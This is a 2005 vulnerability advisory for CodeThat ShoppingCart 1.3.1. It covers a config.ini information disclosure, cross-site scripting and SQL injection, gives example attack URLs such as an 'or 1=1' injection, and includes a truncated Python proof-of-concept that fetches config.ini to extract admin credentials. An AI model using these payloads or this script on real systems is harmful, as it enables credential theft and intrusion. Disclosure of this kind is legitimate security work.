########################################################## CodeThat ShoppingCart Critical information disclosure XSS and SQL injection vendor Url: http://www.codethat.com/shoppingcart/ advisore:http://lostmon.blogspot.com/2005/05/ codethat-shoppingcart-critical.html vendor notifY: yes exploit available: yes Discovered By Lostmon And icaro exploit code by icaro ############################################################ CodeThat ShoppingCart contains a flaw that may lead to an unauthorized disclosure of SQL conection data.It is possible to gain access to plain text SQL configuration details, this could allow a user to create a specially crafted URL to access 'config.ini' file, which may lead to a loss of confidentiality. This flaw reveals too the admin´s username and his password hash.(automated exploit available) and the credential for configuration of SMTP server. Contains a flaw too that allows a remote cross site scripting attack.This flaw exists because the application does not validate 'id' variables upon submission to the catalog.php scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity. All flaws are found by Lostmon (lostmon@gmail.com) and icaro (icaro0@gmail.com)and exploit code is coded by icaro from http://www.badchecksum.tk ########## versions: ########## 1.3.1 ########### Solution ########### no solution at this time ############ Timeline ############ discovered: 6 may 2005 vendor notify: 7 may 2005 vendor response: 8 may 2005 (automated response form spamarrest) vendor fix: disclosure:9 may 2005 ########## examples: #################### Cross site scripting #################### http://[victim]/codethat/catalog.php?action=category_show &id=2"> ############### SQL injections ############### http://[victim]/shoppingcart/catalog.php?action=category_show &id=1%20or%20like%20%60a%%60 nice SQL error/response ... umm them try to list all products: http://[victim]shoppingcart/demo/catalog.php?action= category_show&id=1%20or%201=1 command execution sucesfully !!!! aparently, non critical SQL injection ,the data base only have tree tables and no passwords or other information are stored in the database. ############################## Critical information disclosure Exploit code include. ############################### A remote user can access directly to SQL user name, password host, and all details about SQL configuration. A remote user can access Directly to admin´s user name and password hash. http://[victim]/shoppingcart/config.ini ############################## Critical information disclosure. ############################### A remote user can access directly to SQL user name, password host, and all details about SQL configuration. A remote user can access Directly to admin´s user name and password hash. A remote user can obtain information about SMTP configuration. http://[victim]/shoppingcart/config.ini ############################################# Proof of concept automated exploit in Python ############################################# # Lostmon Dismarking tm && icaro Badchecksum tm # Extract information tool exploit # Coded by icaro, Discovered by lostmon && icaro import httplib import sys import string import socket import os def uso(): print '\n\n\nLOSTMON DISMARKING && ICARO BADCHECKSUM TEAM\n' print 'Usage: python ' + sys.argv[0] + ' host /directory_of_shoping_cart/\n' print 'Example: python '+ sys.argv[0] +' www.myhost.com /shoping/\n' def leeini(direccionweb,directorioshoping): web=httplib.HTTP(direccionweb) web.putrequest('GET',directorioshoping+'config.ini') web.putheader('Host',direccionweb) web.putheader('Accept', 'text/html') web.putheader('Accept', 'text/plain') web.endheaders() errcode, errmsg, headers = web.getreply() fichero=web.getfile() datos=fichero.read() f=open('tmp.txt','w') f.write(datos) f.close f=open('tmp.txt','r') lineas=f.readlines() f.close n=0 print 'EXTRACCION DE PASSWD DE ADMIN SHOPING CART\n' while n